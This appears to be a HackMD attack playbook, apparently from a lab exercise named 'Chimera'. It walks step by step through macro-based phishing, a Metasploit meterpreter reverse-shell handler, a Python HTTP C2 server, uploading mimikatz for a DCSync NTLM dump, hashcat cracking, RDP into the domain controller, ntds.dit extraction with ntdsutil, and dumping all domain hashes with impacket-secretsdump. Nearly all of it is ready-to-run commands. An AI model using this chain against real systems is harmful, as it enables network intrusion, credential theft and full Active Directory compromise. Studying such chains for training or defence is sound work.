Payload - HackMD

# Payload ###### tags: `Chimera` [TOC] ## Send mail containing malicious macro code ### create an office file with macro code ![](https://i.imgur.com/ZMJisQp.png) ## Waiting for victim open then gets reverse shell ### build msfconsole handler ```= use exploit/multi/handler set encoder x64/xor_dynamic set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 7777 set ExitOnSession false exploit -j -z ``` ### build C2 server(http) ```= python3 -m http.server ``` ## Dump AD user NTLM and Crack in Win10 ### upload mimikatz in Kali(metepreter) 1. Get File Location(in shell) 1. upload mimikatz ```cmd= upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe C:\\\\Users\\ITM\\Desktop\\mimikatz.exe upload /usr/share/windows-resources/mimikatz/x64/mimidrv.sys C:\\\\Users\\ITM\\Desktop\\mimidrv.sys upload /usr/share/windows-resources/mimikatz/x64/mimilib.dll C:\\\\Users\\ITM\\Desktop\\mimilib.dll ``` ### get Domain and Username in Kali(metepreter) ```cmd= shell whoami ipconfig /all ``` ### Dump user's NTLM in Kali(metepreter) ```cmd= cd c:\Users\ITM\Desktop\ mimikatz.exe lsadump::dcsync /domain:chimera.org /user:ITM ##get ntlm ``` ### Crack User's password in Kali(other terminal) ```cmd= echo <username>:<UID>:aad3b435b51404eeaad3b435b51404ee:<NTLM>::: > crack.txt hashcat -m 1000 -a 0 crack.txt wordlist.txt -o ans.txt ``` :::info * if The length of user's password is not enough, the prefix of hash is aad3b435b51404eeaad3b435b51404ee * Format in hashcat with NTLM <username>:<UID>:<Hash Prefix>:<Hash Suffix>::: * UID is not import in here ::: ## Login ADServer & Crack All AD user password ### RDP ADserver in Kali ```cmd= rdesktop -u ITM -p <password> -d <domain> <IP> -r disk:<name>=<local file addr> ``` :::info -u username -p password -d Domain -r ::: ### Get ntds.dit SYSTEM in ADServer cmd(admin) ```cmd= ntdsutil activate instance ntds ifm create full C:\ntdsutil quit quit ``` ### Crack All user&password 1. Get SYSTEM ntds.dit Back to Kali 1. Dump (in kali) ```cmd= impacket-secretsdump -system <SYSTEM> -ntds <ntds.dit> LOCAL ``` 1. MAKE hash.txt 1. Crack ```cmd= hashcat -m 1000 -a 0 hash.txt wordlist.txt -o password.txt ```